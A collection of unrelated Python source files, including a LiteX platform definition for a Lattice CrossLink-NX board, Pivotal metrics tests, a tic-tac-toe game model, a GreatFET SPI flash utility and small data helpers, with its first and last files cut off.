should be ([[top_left_x, top_left_y], [bottom_right_x, bottom_right_y]]).
e.g. [[0, 0], [1, 1]] would be the full image, [[0.5, 0.5], [1, 1]] would be bottom right."""
rc = relative_corners
raw_height, raw_width = img.shape[:2]
top_left_pix = [int(rc[0][0] * raw_width), int(rc[0][1] * raw_height)]
bottom_right_pix = [int(rc[1][0] * raw_width), int(rc[1][1] * raw_height)]
img_cropped = img[top_left_pix[1]:bottom_right_pix[1], top_left_pix[0]:bottom_right_pix[0]]
return img_cropped |
#
# This file is part of LiteX-Boards.
#
# Copyright (c) 2020 David Corrigan <[email protected]>
# Copyright (c) 2020 Alan Green <[email protected]>
# SPDX-License-Identifier: BSD-2-Clause
from litex.build.generic_platform import *
from litex.build.lattice import LatticePlatform
from litex.build.lattice.programmer import LatticeProgrammer
# IOs ----------------------------------------------------------------------------------------------
_io = [
# Section 5.1 Clock sources
("clk12", 0, Pins("L13"), IOStandard("LVCMOS33")), # Ensure JP2 is installed
# Clock signal is differential, but we only name the "p" side.
("clk125", 0, Pins("C12"), IOStandard("LVDS")),
# 7.2. General Purpose Push Buttons - all logic zero when pressed
("gsrn", 0, Pins("G19"), IOStandard("LVCMOS33")), # SW4
("programn", 0, Pins("E11"), IOStandard("LVCMOS33")), # SW5
("user_btn", 0, Pins("G14"), IOStandard("LVCMOS33")), # SW2
("user_btn", 1, Pins("G15"), IOStandard("LVCMOS33")), # SW3
# Section 6.2 UART Topology
# Requires installation of 0-ohm jumpers R15 and R17 to properly route signals
# Note that it is R15 and R17, not R16 and R17 as stated in the user guide
("serial", 0,
Subsignal("rx", Pins("F16"), IOStandard("LVCMOS33")),
Subsignal("tx", Pins("F18"), IOStandard("LVCMOS33")),
),
# Section 7.3 General Purpose LEDs
("user_led", 0, Pins("E17"), IOStandard("LVCMOS33")), # Bank 1 Green
("user_led", 1, Pins("F13"), IOStandard("LVCMOS33")), # Bank 1 Green
("user_led", 2, Pins("G13"), IOStandard("LVCMOS33")), # Bank 1 Green
("user_led", 3, Pins("F14"), IOStandard("LVCMOS33")), # Bank 1 Green
("user_led", 4, Pins("L16"), IOStandard("LVCMOS33")), # Bank 1 Green
("user_led", 5, Pins("L15"), IOStandard("LVCMOS33")), # Bank 1 Green
("user_led", 6, Pins("L20"), IOStandard("LVCMOS33")), # Bank 1 Green
("user_led", 7, Pins("L19"), IOStandard("LVCMOS33")), # Bank 1 Green
("user_led", 8, Pins("R17"), IOStandard("LVCMOS33")), # Bank 2 Green
("user_led", 9, Pins("R18"), IOStandard("LVCMOS33")), # Bank 2 Green
("user_led", 10, Pins("U20"), IOStandard("LVCMOS33")), # Bank 2 Green
("user_led", 11, Pins("T20"), IOStandard("LVCMOS33")), # Bank 2 Green
("user_led", 12, Pins("W20"), IOStandard("LVCMOS33")), # Bank 2 Yellow
("user_led", 13, Pins("V20"), IOStandard("LVCMOS33")), # Bank 2 Yellow
# Section 7.1 DIP Switch
("user_dip_btn", 0, Pins("N14"), IOStandard("LVCMOS33")),
("user_dip_btn", 1, Pins("M14"), IOStandard("LVCMOS33")),
("user_dip_btn", 2, Pins("M16"), IOStandard("LVCMOS33")),
("user_dip_btn", 3, Pins("M15"), IOStandard("LVCMOS33")),
("user_dip_btn", 4, Pins("N15"), IOStandard("LVCMOS33")),
("user_dip_btn", 5, Pins("N16"), IOStandard("LVCMOS33")),
("user_dip_btn", 6, Pins("M17"), IOStandard("LVCMOS33")),
("user_dip_btn", 7, Pins("M18"), IOStandard("LVCMOS33")),
# Section 6.3.1. SPI Configuration
("spiflash", 0,
Subsignal("cs_n", Pins("E13")),
Subsignal("clk", Pins("E12")),
Subsignal("mosi", Pins("D13")),
Subsignal("miso", Pins("D15")),
Subsignal("wp", Pins("D14")),
Subsignal("hold", Pins("D16")),
IOStandard("LVCMOS33")
),
("spiflash4x", 0,
Subsignal("cs_n", Pins("E13")),
Subsignal("clk", Pins("E12")),
Subsignal("dq", Pins("D13 D15 D14 D16")),
IOStandard("LVCMOS33")
),
# Section 8.2 Parallel FMC Configuration Connector
("fmc_config", 0,
Subsignal("fmc_tck", Pins("P19")), # 3
Subsignal("ps_por_b", Pins("N19")), # 4
Subsignal("fmc_tdi", Pins("P20")), # 7
Subsignal("fmc_prsnt", Pins("N20")), # 8
Subsignal("fmc_tdo", Pins("P17")), # 9
Subsignal("fmc_scl", Pins("M20")), # 10
Subsignal("fmc_tms", Pins("P18")), # 13
Subsignal("fmc_sda", Pins("M19")), # 14
IOStandard("LVCMOS33")
),
]
# Connectors ---------------------------------------------------------------------------------------
_connectors = [
#TODO ADC
#TODO D-PHY
# Section 8.1 FMC LPC Connector
("FMC", {
"LA06_P" : "W9", # C10
"LA06_N" : "Y9", # C11
"LA10_P" : "W10", # C14
"LA10_N" : "Y10", # C15
"LA14_P" : "W11", # C18
"LA14_N" : "Y11", # C19
"LA18_CC_P" : "R8", # C22
"LA18_CC_N" : "T8", # C23
"LA27_P" : "Y13", # C26
"LA27_N" : "Y14", # C27
"LA01_CC_P" : "W13", # D08
"LA01_CC_N" : "V12", # D09
"LA05_P" : "R5", # D11
"LA05_N" : "R6", # D12
"LA09_P" : "V6", # D14
"LA09_N" : "U7", # D15
"LA13_P" : "R9", # D17
"LA13_N" : "P9", # D18
"LA17_P" : "U10", # D20
"LA17_N" : "V10", # D21
"LA23_P" : "P11", # D23
"LA23_N" : "R11", # D24
"LA26_P" : "T13", # D26
"LA26_N" : "T14", # D27
"CLK1_P" : "R7", # G02
"CLK1_N" : "T7", # G03
"LA00_CC_P" : "V11", # G06
"LA00_CC_N" : "U11", # G07
"LA03_P" : "W6", # G09
"LA03_N" : "Y6", # G10
"LA08_P" : "Y7", # G12
"LA08_N" : "Y8", # G13
"LA12_P" : "U1", # G15
"LA12_N" : "T1", # G16
"LA16_P" : "P7", # G18
"LA16_N" : "P8", # G19
"LA20_P" : "T10", # G21
"LA20_N" : "T11", # G22
"LA22_P" : "V14", # G24
"LA22_N" : "U14", # G25
"LA25_P" : "R12", # G27
"LA25_N" : "P12", # G28
"LA29_P" : "Y15", # G30
"LA29_N" : "Y16", # G31
"LA31_P" : "Y17", # G33
"LA31_N" : "U16", # G34
"VREF" : "T6", # H01
"VREFa" : "Y18", # H01
"CLK0_P" : "Y12", # H04
"CLK0_N" : "W12", # H05
"LA02_P" : "Y2", # H07
"LA02_N" : "Y3", # H08
"LA04_P" : "V1", # H10
"LA04_N" : "W1", # H11
"LA07_P" : "W7", # H13
"LA07_N" : "V7", # H14
"LA11_P" : "P10", # H16
"LA11_N" : "R10", # H17
"LA15_P" : "W8", # H19
"LA15_N" : "V9", # H20
"LA19_P" : "U12", # H22
"LA19_N" : "T12", # H23
"LA21_P" : "P13", # H25
"LA21_N" : "R13", # H26
"LA24_P" : "W14", # H28
"LA24_N" : "W15", # H29
"LA28_P" : "U15", # H31
"LA28_N" : "U16", # H32
"LA30_P" : "V17", # H34
"LA30_N" : "U16", # H35
}),
# Section 8.3 Raspberry Pi Board GPIO Header
("RASP",
"None", # (no pin 0)
"None", # 1 3.3V
"None", # 2 5V
"L6", # 3 RASP_IO02
"None", # 4 5V
"L5", # 5 RASP_IO03
"None", # 6 GND
"M3", # 7 RASP_IO04
"M2", # 8 RASP_IO14
"None", # 9 GND
"L1", # 10 RASP_IO15
"L2", # 11 RASP_IO17
"R2", # 12 RASP_IO18
"R1", # 13 RASP_IO27
"None", # 14 GND
"P2", # 15 RASP_IO22
"P1", # 16 RASP_IO23
"None", # 17 3.3V
"K7", # 18 RASP_IO24
"N4", # 19 RASP_IO10
"None", # 20 GND
"K6", # 21 RASP_IO09
"K5", # 22 RASP_IO25
"N7", # 23 RASP_IO11
"P6", # 24 RASP_IO08
"None", # 25 GND
"N5", # 26 RASP_IO07
"M7", # 27 RASP_ID_SD
"M4", # 28 RASP_ID_SC
"K8", # 29 RASP_IO05
"None", # 30 GND
"L7", # 31 RASP_IO06
"L8", # 32 RASP_IO12
"M5", # 33 RASP_IO13
"None", # 34 GND
"M6", # 35 RASP_IO19
"N6", # 36 RASP_IO16
"P5", # 37 RASP_IO26
"R3", # 38 RASP_IO20
"None", # 39 GND
"R4", # 40 RASP_IO21
),
# Section 8.6 PMOD Header
# PMOD signal number:
# 1 2 3 4 7 8 9 10
("PMOD0", "D10 D9 D7 D8 D6 D5 D4 D3"),
("PMOD1", "E10 E9 E7 E8 E4 E3 E2 F1"),
("PMOD2", "J2 J1 K2 K1 K3 K4 D17 E18"),
]
# Test and Demo ------------------------------------------------------------------------------------
serial_pmods = [
("serial_pmod0", 0,
Subsignal("rx", Pins("PMOD0:0"), IOStandard("LVCMOS33")),
Subsignal("tx", Pins("PMOD0:1"), IOStandard("LVCMOS33")),
),
("serial_pmod1", 0,
Subsignal("rx", Pins("PMOD1:0"), IOStandard("LVCMOS33")),
Subsignal("tx", Pins("PMOD1:1"), IOStandard("LVCMOS33")),
),
("serial_pmod2", 0,
Subsignal("rx", Pins("PMOD2:0"), IOStandard("LVCMOS33")),
Subsignal("tx", Pins("PMOD2:1"), IOStandard("LVCMOS33")),
),
]
# Platform -----------------------------------------------------------------------------------------
class Platform(LatticePlatform):
def __init__(self, device="LIFCL", **kwargs):
assert device in ["LIFCL"]
LatticePlatform.__init__(self, device + "-40-9BG400C", _io, _connectors, toolchain="radiant", **kwargs)
def create_programmer(self, mode = "direct"):
assert mode in ["direct","flash"]
xcf_template_direct = """<?xml version='1.0' encoding='utf-8' ?>
<!DOCTYPE ispXCF SYSTEM "IspXCF.dtd" >
<ispXCF version="R1.2.0">
<Comment></Comment>
<Chain>
<Comm>JTAG</Comm>
<Device>
<SelectedProg value="TRUE"/>
<Pos>1</Pos>
<Vendor>Lattice</Vendor>
<Family>LIFCL</Family>
<Name>LIFCL-40</Name>
<IDCode>0x010f1043</IDCode>
<Package>All</Package>
<PON>LIFCL-40</PON>
<Bypass>
<InstrLen>8</InstrLen>
<InstrVal>11111111</InstrVal>
<BScanLen>1</BScanLen>
<BScanVal>0</BScanVal>
</Bypass>
<File>{bitstream_file}</File>
<JedecChecksum>N/A</JedecChecksum>
<MemoryType>Static Random Access Memory (SRAM)</MemoryType>
<Operation>Fast Configuration</Operation>
<Option>
<SVFVendor>JTAG STANDARD</SVFVendor>
<IOState>HighZ</IOState>
<PreloadLength>362</PreloadLength>
<IOVectorData>0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF</IOVectorData>
<Usercode>0x00000000</Usercode>
<AccessMode>Direct Programming</AccessMode>
</Option>
</Device>
</Chain>
<ProjectOptions>
<Program>SEQUENTIAL</Program>
<Process>ENTIRED CHAIN</Process>
<OperationOverride>No Override</OperationOverride>
<StartTAP>TLR</StartTAP>
<EndTAP>TLR</EndTAP>
<VerifyUsercode value="FALSE"/>
<TCKDelay>3</TCKDelay>
</ProjectOptions>
<CableOptions>
<CableName>USB2</CableName>
<PortAdd>FTUSB-0</PortAdd>
</CableOptions>
</ispXCF>
"""
xcf_template_flash = """<?xml version='1.0' encoding='utf-8' ?>
<!DOCTYPE ispXCF SYSTEM "IspXCF.dtd" >
<ispXCF version="R1.2.0">
<Comment></Comment>
<Chain>
<Comm>JTAG2SPI</Comm>
<Device>
<SelectedProg value="TRUE"/>
<Pos>1</Pos>
<Vendor>Lattice</Vendor>
<Family>LIFCL</Family>
<Name>LIFCL-40</Name>
<Package>All</Package>
<Bypass>
<InstrLen>8</InstrLen>
<InstrVal>11111111</InstrVal>
<BScanLen>1</BScanLen>
<BScanVal>0</BScanVal>
</Bypass>
<File>{bitstream_file}</File>
<MemoryType>External SPI Flash Memory (SPI FLASH)</MemoryType>
<Operation>Erase,Program,Verify</Operation>
<Option>
<SVFVendor>JTAG STANDARD</SVFVendor>
<Usercode>0x00000000</Usercode>
<AccessMode>Direct Programming</AccessMode>
</Option>
<FPGALoader>
<CPLDDevice>
<Device>
<Pos>1</Pos>
<Vendor>Lattice</Vendor>
<Family>LIFCL</Family>
<Name>LIFCL-40</Name>
<IDCode>0x010f1043</IDCode>
<Package>All</Package>
<PON>LIFCL-40</PON>
<Bypass>
<InstrLen>8</InstrLen>
<InstrVal>11111111</InstrVal>
<BScanLen>1</BScanLen>
<BScanVal>0</BScanVal>
</Bypass>
<MemoryType>Static Random Access Memory (SRAM)</MemoryType>
<Operation>Refresh Verify ID</Operation>
<Option>
<SVFVendor>JTAG STANDARD</SVFVendor>
<IOState>HighZ</IOState>
<PreloadLength>362</PreloadLength>
<IOVectorData>0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF</IOVectorData>
<AccessMode>Direct Programming</AccessMode>
</Option>
</Device>
</CPLDDevice>
<FlashDevice>
<Device>
<Pos>1</Pos>
<Vendor>Macronix</Vendor>
<Family>SPI Serial Flash</Family>
<Name>MX25L12833F</Name>
<IDCode>0x18</IDCode>
<Package>8-pin SOP</Package>
<Operation>Erase,Program,Verify</Operation>
<File>{bitstream_file}</File>
<AddressBase>0x00000000</AddressBase>
<EndAddress>0x000F0000</EndAddress>
<DeviceSize>128</DeviceSize>
<DataSize>1016029</DataSize>
<NumberOfDevices>1</NumberOfDevices>
<ReInitialize value="FALSE"/>
</Device>
</FlashDevice>
<FPGADevice>
<Device>
<Pos>1</Pos>
<Name></Name>
<File>{bitstream_file}</File>
<LocalChainList>
<LocalDevice index="-99"
name="Unknown"
file="{bitstream_file}"/>
</LocalChainList>
<Option>
<SVFVendor>JTAG STANDARD</SVFVendor>
</Option>
</Device>
</FPGADevice>
</FPGALoader>
</Device>
</Chain>
<ProjectOptions>
<Program>SEQUENTIAL</Program>
<Process>ENTIRED CHAIN</Process>
<OperationOverride>No Override</OperationOverride>
<StartTAP>TLR</StartTAP>
<EndTAP>TLR</EndTAP>
<DisableCheckBoard value="TRUE"/>
<VerifyUsercode value="FALSE"/>
<TCKDelay>3</TCKDelay>
</ProjectOptions>
<CableOptions>
<CableName>USB2</CableName>
<PortAdd>FTUSB-0</PortAdd>
<USBID>Lattice CrossLink-NX Eval Board A Location 0000 Serial FT4J4IK9A</USBID>
</CableOptions>
</ispXCF>
"""
if mode == "direct":
xcf_template = xcf_template_direct
if mode == "flash":
xcf_template = xcf_template_flash
return LatticeProgrammer(xcf_template)
|
from datetime import datetime, timedelta
import pytest
from app.source import get_datetime, get_process_cycle_efficiency
from app.source.pivotal import Pivotal
def mock_pivotal_client(
mocker, project_info={}, iterations=[],
story_started="2018-11-01T12:00:00Z", stories=[],
story_blockers=[], story_activities={}
):
mocker.patch("os.environ", {
'TM_PIVOTAL_PAT': 'test_pat',
'TM_PIVOTAL_PROJECT_ID': 'test_project_id',
})
if project_info == {}:
project_info = {
'iteration_length': 1,
'current_iteration_number': 3
}
if iterations == []:
iterations = [
{
"number": "1",
"start": "2018-11-01T12:00:00Z",
"finish": "2018-11-15T12:00:00Z",
"stories": stories
}
]
if stories == []:
stories = [
{
"id": 1,
"current_state": "accepted",
"name": "test",
"accepted_at": "2018-11-01T12:00:00Z",
}
]
if story_activities == {}:
story_activities[1] = [
{
'highlight': 'started',
'changes': [
{
'kind': 'story',
'new_values': {
'updated_at': story_started
}
}
],
}
]
class MockPivotalClient:
def __init__(self, _, project_id=''):
self.project_id = project_id
def get_project(self):
return project_info
def get_project_iterations(self, offset=1, limit=10):
return iterations
def get_story_blockers(self, story_id):
for blocker in story_blockers:
if blocker['story_id'] == story_id:
return story_blockers
return []
def get_story_activities(self, story_id):
return story_activities.get(story_id)
mocker.patch("app.source.pivotal.PivotalClient", MockPivotalClient)
def test_get_blocked_time(mocker):
story = {
"id": 1,
"current_state": "accepted",
"name": "test",
"created_at": "2018-11-01T12:00:00Z",
"accepted_at": "2018-11-02T12:00:00Z",
}
story_blockers = [
{
'story_id': 1,
'resolved': True,
'created_at': '2018-11-01T12:00:00Z',
'updated_at': '2018-11-02T12:00:00Z',
}
]
mock_pivotal_client(mocker, stories=[story], story_blockers=story_blockers)
p = Pivotal()
blocked_time = p.get_blocked_time(story['id'])
assert blocked_time == timedelta(days=1)
def test_get_blocked_time_unresolved_is_none(mocker):
story = {
"id": 1,
"current_state": "started",
"name": "test",
"created_at": "2018-11-01T12:00:00Z",
}
story_blockers = [
{
'story_id': 1,
'resolved': False,
'created_at': '2018-11-01T12:00:00Z',
'updated_at': '2018-11-02T12:00:00Z',
}
]
mock_pivotal_client(mocker, stories=[story], story_blockers=story_blockers)
p = Pivotal()
blocked_time = p.get_blocked_time(story)
assert blocked_time is None
def test_pvotal_get_metrics(mocker):
story_started = "2018-11-01T12:00:00Z"
story_accepted = "2018-11-05T12:00:00Z"
story = {
"id": 1,
"current_state": "accepted",
"name": "test",
"accepted_at": story_accepted,
}
mock_pivotal_client(mocker, story_started=story_started, stories=[story])
p = Pivotal()
metrics = p.get_metrics()
assert len(metrics) == 1
assert metrics[0].avg_cycle_time == (
# subtract 2 days as there is a weekend between start end accepted
get_datetime(story_accepted) - get_datetime(story_started) - timedelta(days=2)
).total_seconds()
assert metrics[0].process_cycle_efficiency == 1
def test_get_pivotal_metrics_with_story_blocker(mocker):
story_started = "2018-11-01T12:00:00Z"
story_accepted = "2018-11-05T12:00:00Z"
blocked_start = "2018-11-01T12:00:00Z"
blocked_updated = "2018-11-02T12:00:00Z"
story = {
"id": 1,
"current_state": "accepted",
"name": "test",
"accepted_at": story_accepted,
}
blocker = {
"story_id": 1,
"resolved": True,
"created_at": blocked_start,
"updated_at": blocked_updated,
}
mock_pivotal_client(
mocker,
stories=[story], story_blockers=[blocker]
)
p = Pivotal()
metrics = p.get_metrics()
assert len(metrics) == 1
assert metrics[0].avg_cycle_time == (
get_datetime(story_accepted) - get_datetime(story_started) - timedelta(days=2)
).total_seconds()
assert metrics[0].process_cycle_efficiency == (
(get_datetime(blocked_updated) - get_datetime(blocked_start)) /
(get_datetime(story_accepted) - get_datetime(story_started) - timedelta(days=2))
)
assert metrics[0].num_incomplete == 0
def test_get_pivotal_metrics_with_story_blocker_unresolved(mocker):
story_started = "2018-11-01T12:00:00Z"
story_accepted = "2018-11-07T12:00:00Z"
blocked_start = "2018-11-05T12:00:00Z"
stories = [
{
"id": 1,
"current_state": "accepted",
"name": "test",
"accepted_at": story_accepted,
},
{
"id": 2,
"current_state": "started",
"name": "test 2",
}
]
blocker = {
"story_id": 2,
"resolved": False,
"created_at": blocked_start,
}
mock_pivotal_client(
mocker,
story_started=story_started,
stories=stories, story_blockers=[blocker]
)
p = Pivotal()
metrics = p.get_metrics()
assert len(metrics) == 1
assert metrics[0].avg_cycle_time == (
get_datetime(story_accepted) - get_datetime(story_started) - timedelta(days=2)
).total_seconds()
assert metrics[0].process_cycle_efficiency == 1
assert metrics[0].num_incomplete == 1
|
import json
with open('data/moon-data.json', 'r') as f:
data = json.load(f)
for planet in data:
planet['moons'].sort(key=lambda p: p['orbit'])
with open('data/moon-data.json', 'w') as f:
f.write(json.dumps(data, indent=4))
|
"""
Date: 2022.05.19 14:30:18
LastEditors: Rustle Karl
LastEditTime: 2022.05.20 10:20:18
"""
import traceback
def another_function():
lumberstack()
def lumberstack():
print("-" * 60)
traceback.print_stack()
print("-" * 60)
print(repr(traceback.extract_stack()))
print("-" * 60)
print(repr(traceback.format_stack()))
print("-" * 60)
another_function()
|
from collections import namedtuple
from dataclasses import dataclass
from enum import Enum
from typing import Any, Dict, List, Optional, Sequence, Tuple
from uuid import UUID
from pydantic import BaseModel, validator
MIN_GRID_WIDTH = 3
MIN_GRID_HEIGHT = 3
MAX_GRID_WIDTH = 10
MAX_GRID_HEIGHT = 10
MIN_WINNING_LINE = 3
@dataclass
class Player:
uuid: UUID
Cell = namedtuple("Cell", ["x", "y"])
class CellValue(Enum):
EMPTY = "empty"
X = "X"
O = "O"
class Grid(BaseModel):
cells: Dict[Cell, CellValue]
width: int
height: int
@validator("cells")
def validate_cells(
cls, cells: Dict[Cell, CellValue], values: Dict[str, Any]
) -> Dict[Cell, CellValue]:
width = values["width"]
height = values["height"]
for cell in cells:
if not (0 <= cell.x < width) or not (0 <= cell.y < height):
raise ValueError("Cell position is out of range")
return cells
def set_value(self, cell: Cell, value: CellValue) -> None:
self.cells[cell] = value
def get_value(self, cell: Cell) -> CellValue:
return self.cells[cell]
def get_winning_line(self, winning_line_length: int) -> Optional[Sequence[Cell]]:
assert winning_line_length >= MIN_WINNING_LINE
for x in range(self.width):
for y in range(self.height):
for shift_x, shift_y in [
(0, 1),
(1, 0),
(1, -1),
(1, 1),
]:
cells_to_check = [
Cell(x + shift_x * d, y + shift_y * d)
for d in range(winning_line_length)
]
if all(
[
0 <= cell.x < self.width and 0 <= cell.y < self.height
for cell in cells_to_check
]
):
cell_values = [
self.cells[cell].value for cell in cells_to_check
]
if cell_values.count(cell_values[0]) == len(cell_values):
return cells_to_check
return None
class State:
def __init__(self, grid_size: Tuple[int, int], winning_line: int) -> None:
self._players: List[UUID] = []
self._player_to_start: Optional[UUID] = None
self._player_to_move: Optional[UUID] = None
self._finished = False
self._winner: Optional[UUID] = None
width, height = grid_size
assert MIN_GRID_WIDTH <= width <= MAX_GRID_WIDTH
assert MIN_GRID_HEIGHT <= height <= MAX_GRID_HEIGHT
assert MIN_WINNING_LINE <= winning_line < max(grid_size)
self._grid = Grid(
width=width,
height=height,
cells={
Cell(x=x, y=y): CellValue.EMPTY
for x in range(width)
for y in range(height)
},
)
self._winning_line = winning_line
@property
def winner(self) -> Optional[UUID]:
return self._winner
@property
def finished(self) -> bool:
return self._finished
@property
def winning_line(self) -> Optional[Sequence[Cell]]:
return self._grid.get_winning_line(self._winning_line)
def _check_win(self) -> bool:
winning_line = self._grid.get_winning_line(self._winning_line)
if winning_line is not None:
self._finished = True
winning_value = self._grid.get_value(winning_line[0])
if winning_value == self.get_player_value(self._players[0]):
self._winner = self._players[0]
else:
self._winner = self._players[1]
return True
return False
def get_player_value(self, player_uuid: UUID) -> CellValue:
if player_uuid not in self._players:
# TODO
raise ValueError()
return CellValue.X if player_uuid == self._player_to_start else CellValue.O
def set_players(self, players: Sequence[UUID]) -> None:
if len(players) != 2:
# TODO
raise ValueError()
self._players = players
def set_player_to_start(self, player_to_start: UUID) -> None:
if player_to_start not in self._players:
# TODO
raise ValueError()
self._player_to_start = player_to_start
def move(self, player_uuid: UUID, cell: Cell) -> None:
if self.finished:
# TODO
raise ValueError()
if self._player_to_move != player_uuid:
# TODO
raise ValueError()
self._grid.set_value(cell, self.get_player_value(player_uuid))
if self._player_to_move == self._players[0]:
self._player_to_move = self._players[1]
else:
self._player_to_move = self._players[0]
self._check_win()
|
#!/usr/bin/env python
#
# This file is part of GreatFET
#
"""
Utility for flashing the onboard SPI flash on GreatFET boards.
"""
from __future__ import print_function
import os
import sys
import time
import errno
import argparse
import subprocess
import usb
from greatfet import GreatFET
from greatfet.errors import DeviceNotFoundError
from greatfet.utils import log_silent, log_verbose
# The serial number expected from the DFU flash stub.
DFU_STUB_SERIAL = "dfu_flash_stub"
DFU_STUB_NAME = 'flash_stub.dfu'
DFU_STUB_PATHS = [ '~/.local/share/greatfet', '~/.local/share/GreatFET' ]
# Vendor VID/PID if the device is in DFU.
NXP_DFU_VID = 0x1fc9
NXP_DFU_PID = 0x000c
# Maximum length to allow, for now.
MAX_FLASH_LENGTH = 0x100000
def spi_flash_read(device, filename, address, length, log_function=log_silent):
"""Reads the data from the device's SPI flash to a file. """
def print_progress(bytes_read, bytes_total):
log_function("Read {} bytes of {}.".format(bytes_read, bytes_total), end='\r')
# Read the data from the board's SPI flash to a file.
with open(filename, 'wb') as f:
flash_data = device.onboard_flash.read(address, length,
progress_callback=print_progress)
flash_data.tofile(f)
log_function('')
def spi_flash_write(device, filename, address, log_function=log_silent):
"""Writes the data from a given file to the SPI flash."""
def print_progress(bytes_written, bytes_total):
log_function("Written {} bytes of {}.".format(bytes_written, bytes_total), end='\r')
# Read the data from the board's SPI flash to a file.
with open(filename, 'rb') as f:
flash_data = f.read()
device.onboard_flash.write(flash_data, address,
erase_first=True,
progress_callback=print_progress)
log_function('')
def find_dfu_stub(args):
""" Finds the DFU stub. """
# FIXME: This should be cleaned up to search paths that make sense given
# where and how we might install GreatFET.
# If we have an explicit DFU stub location, use it.
if args.dfu_stub:
path = os.path.expanduser(args.dfu_stub)
if os.path.isfile(path):
return path
# Otherwise, search each of the paths around.
for path in DFU_STUB_PATHS:
filename = os.path.expanduser(os.path.join(path, DFU_STUB_NAME))
print(filename)
if os.path.isfile(filename):
return filename
# If we weren't able to find it, give up, for now.
# TODO: eventually ship this with the GreatFET distribution and/or
# download it on demand?
return None
def load_dfu_stub(args):
""" Loads a DFU programming stub onto a GreatFET in DFU mode. """
# First: check to make sure we _have_ a DFU'able device.
dev = usb.core.find(idVendor=NXP_DFU_VID, idProduct=NXP_DFU_PID)
if not dev:
raise DeviceNotFoundError
del dev
# If we have a DFU'able device, find the DFU stub and load it.
stub_path = find_dfu_stub(args)
if stub_path is None:
raise ValueError("Could not find the DFU stub!")
#
# FIXME: This isn't a good way to do things. It's being stubbed in
# for now, but it'd be better to talk DFU from python directly.
#
rc = subprocess.call(['dfu-util', '--device', format(NXP_DFU_VID, 'x'), format(NXP_DFU_PID, 'x'), '--alt', '0', '--download', stub_path])
if rc:
raise IOError("Error using DFU-util!")
def find_greatfet(args):
""" Finds a GreatFET matching the relevant arguments."""
# If we're prorgamming via DFU mode, look for a device that sports the DFU stub.
# Note that we only support a single DFU-mode device for now.
if args.dfu:
return GreatFET(serial_number=DFU_STUB_SERIAL)
# If we have an index argument, grab _all_ greatFETs and select by index.
elif args.index:
# Find _all_ GreatFETs...
devices = GreatFET(find_all=True)
# ... and then select the one with the provided index.
if len(devices) <= args.index:
raise DeviceNotFoundError
return devices[args.index]
# If we have a serial number, look only for a single device. Theoretically,
# we should never have more than one GreatFET with the same serial number.
# Technically, this is violable, but libusb doesn't properly handle searching
# by serial number if there are multiple devices with the same one, so we
# enforce this.
else:
return GreatFET(serial_number=args.serial)
def main():
# Set up a simple argument parser.
parser = argparse.ArgumentParser(
description="Utility for flashing the GreatFET's onboard SPI flash")
parser.add_argument('-a', '--address', metavar='<n>', type=int,
help="starting address (default: 0)", default=0)
parser.add_argument('-l', '--length', metavar='<n>', type=int,
help="number of bytes to read (default: {})".format(MAX_FLASH_LENGTH),
default=MAX_FLASH_LENGTH)
parser.add_argument('-r', '--read', dest='read', metavar='<filename>', type=str,
help="Read data into file", default='')
parser.add_argument('-w', '--write', dest='write', metavar='<filename>', type=str,
help="Write data from file", default='')
parser.add_argument('-s', '--serial', dest='serial', metavar='<serialnumber>', type=str,
help="Serial number of device, if multiple devices", default=None)
parser.add_argument('-i', '--index', dest='index', metavar='<i>', type=int,
help="number of the attached device (default: 0)", default=0)
parser.add_argument('-q', '--quiet', dest='quiet', action='store_true',
help="Suppress messages to stdout")
parser.add_argument('-R', '--reset', dest='reset', action='store_true',
help="Reset GreatFET after performing other operations.")
parser.add_argument('--wait', dest='wait', action='store_true',
help="Wait for a GreatFET device to come online if none is found.")
parser.add_argument('-d', '--dfu', dest='dfu', action='store_true',
help="Flash a device from DFU mode by first loading a stub. Always resets.")
parser.add_argument('--dfu-stub', dest='dfu_stub', metavar='<stub.dfu>', type=str,
help="The stub to use for DFU programming. If not provided, the utility will attempt to automtaically find one.")
args = parser.parse_args()
# Validate our options.
# If we don't have an option, print our usage.
if not any((args.read, args.write, args.reset,)):
parser.print_help()
sys.exit(0)
# Determine whether we're going to log to the stdout, or not at all.
log_function = log_silent if args.quiet else log_verbose
# If we're supposed to install firmware via a DFU stub, install it first.
if args.dfu:
try:
load_dfu_stub(args)
except DeviceNotFoundError:
print("Couldn't find a GreatFET-compatible board in DFU mode!", file=sys.stderr)
sys.exit(errno.ENODEV)
# Create our GreatFET connection.
log_function("Trying to find a GreatFET device...")
device = None
while device is None:
try:
device = find_greatfet(args)
log_function("{} found. (Serial number: {})".format(device.board_name(), device.serial_number()))
except DeviceNotFoundError:
# If we're not in wait mode (or waiting for a DFU flash stub to come up), bail out.
if not (args.dfu or args.wait):
if args.serial:
print("No GreatFET board found matching serial '{}'.".format(args.serial), file=sys.stderr)
elif args.index:
print("No GreatFET board found with index '{}'.".format(args.index), file=sys.stderr)
else:
print("No GreatFET board found!", file=sys.stderr)
sys.exit(errno.ENODEV)
else:
time.sleep(1)
# Ensure that the device supports an onboard SPI flash.
try:
device.onboard_flash
except AttributeError:
print("The attached GreatFET ({}) doesn't appear to have an SPI flash to program!".format(device.board_name()), file=sys.stderr)
sys.exit(errno.ENOSYS)
# If we have a write command, write first, to match the behavior of hackrf_spiflash.
if args.write:
log_function("Writing data to SPI flash...")
spi_flash_write(device, args.write, args.address, log_function)
log_function("Write complete!")
if not (args.reset or args.dfu):
log_function("Reset not specified; new firmware will not start until next reset.")
# Handle any read commands.
if args.read:
log_function("Reading data from SPI flash...")
spi_flash_read(device, args.read, args.address, args.length, log_function)
log_function("Read complete!")
# Finally, reset the target
if args.reset or args.dfu:
log_function("Resetting GreatFET...")
device.reset(reconnect=False)
log_function("Reset complete!")
if __name__ == '__main__':
main()
|
import numpy as np
import h5py
def save_to_h5(output_filepath, col_name, dataset, expand=True):
if expand:
dataset = np.expand_dims(dataset, axis=0)
# convert float64 to float32 to save space
if dataset.dtype == 'float64':
dataset = np.array(dataset, dtype='float32')
with h5py.File(output_filepath, 'a') as hf:
if col_name not in hf:
datashape = (None, )
if (dataset.ndim > 1):
datashape = (None, ) + dataset.shape[1:]
hf.create_dataset(col_name, data=dataset, maxshape=datashape)
else:
